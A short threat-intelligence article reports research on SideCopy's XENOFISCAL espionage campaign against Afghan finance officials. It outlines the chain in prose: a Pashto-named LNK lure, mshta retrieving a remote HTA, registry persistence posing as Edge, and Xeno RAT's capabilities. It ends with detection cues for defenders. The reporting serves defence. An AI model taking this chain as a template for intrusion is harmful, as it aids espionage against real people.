A new campaign shows how regional espionage groups keep mixing local-language social engineering with commodity remote access tools. Seqrite Labs research indicates that the Pakistan-aligned SideCopy group targeted Afghanistan's Ministry of Finance, provincial revenue and finance directorates, and Pashto-speaking government personnel in an operation tracked as XENOFISCAL.
The attack starts with a ZIP archive containing a malicious Windows shortcut file. The filename is written in Pashto, which matters because it matches the language used in Afghan government circles and suggests the group is targeting specific people rather than sending broad spam. Once someone opens it, the LNK file uses mshta.exe to pull a remote HTML Application from a compromised Afghan education domain.
The infection chain runs obfuscated JavaScript in memory, sets up registry-based persistence while pretending to be Microsoft Edge, and uses a DLL-based loader to drop Xeno RAT 1.8.7 along with a decoy document. This setup gives the attacker stealth and a distraction. The victim sees plausible content while the RAT is staged in the background.
Xeno RAT gives the operator broad post-compromise control. The malware can communicate over TCP, run external DLL modules, move data to the command server, check antivirus information, support SOCKS5 tunneling, perform file operations, capture keystrokes and screenshots, monitor the clipboard, access webcam and microphone signals, remove persistence, and uninstall itself.
For defenders, the final malware family isn't the only signal. Teams watching government, finance, or diplomatic environments in the region should watch for LNK files inside archives, mshta execution from user context, HTA retrieval from unexpected education or public-sector domains, new registry persistence that mimics browsers, and suspicious TCP sessions from endpoints that recently opened lure documents.